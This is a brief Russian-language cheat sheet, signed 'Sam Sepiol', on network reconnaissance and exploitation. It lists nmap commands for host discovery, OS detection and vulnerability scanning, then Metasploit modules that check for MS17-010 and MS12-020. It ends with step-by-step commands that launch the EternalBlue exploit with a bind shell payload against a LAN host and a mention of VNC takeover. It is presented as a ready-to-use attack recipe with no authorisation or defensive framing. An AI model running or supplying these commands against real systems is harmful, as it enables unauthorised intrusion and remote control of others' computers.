Сканировать сеть на хосты и проверить на уязвимости
Sam Sepiol
Просканировать всю сеть на наличие хостов:
Nmap -sS -А 192.168.1.2
nmap 192.168.1.0/24
nmap -sP 192.168.1.0/24
nmap -sV 192.168.1.1/24 - Эта команда будет проверять все 254 хостов в сети и перечислять открытые порты вместе с версией программного обеспечения, работающего на этом хосте.
nmap -A 192.168.1.2 - Эта команда позволит запускать все скрипты и много других вариантов, вот описание из меню справки: Enable OS detection, version detection, script scanning, and traceroute.
сканировать узел и узнать какая операционная система на нем работает:
sudo nmap -O -Pn 192.168.1.16 работает!!!
nmap -O 192.168.1.2
nmap -sS --script smb-os-discovery 192.168.1.14
сканировать хост на все уязвимости в nmap:
nmap 192.168.1.12 --script vuln
сканировать сеть на уязвимость smb_ms17_010:
msfconsole
search type:auxiliary ms17
use auxiliary/scanner/smb/smb_ms17_010
info
set rhosts 192.168.1.2 192.168.1.3 192.168.1.4
run
сканировать сеть на уязвимость ms12-020 RDP (удаленный рабочий стол):
msfconsole
search type:auxiliary ms12-020
use auxiliary/scanner/rdp/ms12_020_check
info
set rhosts 192.168.1.8
run
использовать эксплоит:
msfconsole
search type:exploit ms17_010
use exploit/windows/smb/ms17_010_eternalblue
info
show payloads
set payload windows/x64/shell/bind_tcp
set rhost 192.168.1.11
show options
exploit
управление компьютером с помощью программы VNC через payload